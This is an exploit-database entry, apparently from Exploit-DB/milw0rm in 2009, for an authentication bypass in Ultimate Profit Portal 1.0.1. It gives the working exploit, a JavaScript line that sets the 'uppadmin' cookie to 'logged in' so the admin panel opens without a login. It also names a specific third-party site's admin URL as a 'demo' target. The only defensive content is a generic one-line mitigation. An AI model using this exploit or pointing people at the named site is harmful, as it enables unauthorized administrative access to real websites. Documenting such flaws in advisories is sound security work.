Ultimate Profit Portal Version 1.0.1 Insecure Cookie Handling Vulnerability

vendor:

Ultimate Profit Portal

by:

TiGeR-Dz

7,5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Ultimate Profit Portal

Affected Version From: 1.0.1

Affected Version To: 1.0.1

Patch Exists: NO

Related CWE: N/A

CPE: a:mrcgiguy:ultimate_profit_portal

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2009

Ultimate Profit Portal Version 1.0.1 Insecure Cookie Handling Vulnerability

A vulnerability exists in Ultimate Profit Portal Version 1.0.1 which allows an attacker to set an arbitrary cookie value. An attacker can exploit this vulnerability by setting the uppadmin cookie to logged in, which will allow them to gain access to the admin panel without authentication. The exploit code is javascript:document.cookie="uppadmin=logged%20in;path=/"; and a demo of the exploit can be found at http://www.myhotlinks.net/cgi-bin/directory/admin.cgi.

Mitigation:

Ensure that all cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

---------------------------------------------------------------
---------------------------------------------------------------
Ultimate Profit Portal Version 1.0.1 Insecure Cookie Handling Vulnerability
---------------------------------------------------------------
Founder : TiGeR-Dz
Home:http://www.mrcgiguy.com
Script:Ultimate Profit Portal Version 1.0.1
Download:http://www.mrcgiguy.com/ultimate_profit_portal.html
---------------------------------------------------------------
Exploit
-------
javascript:document.cookie="uppadmin=logged%20in;path=/";
----------------------------------------------------------------
Dem0
----
http://www.myhotlinks.net/cgi-bin/directory/admin.cgi
--------------------------------------

Greeting To ALL My Friends (Dz)

# milw0rm.com [2009-05-14]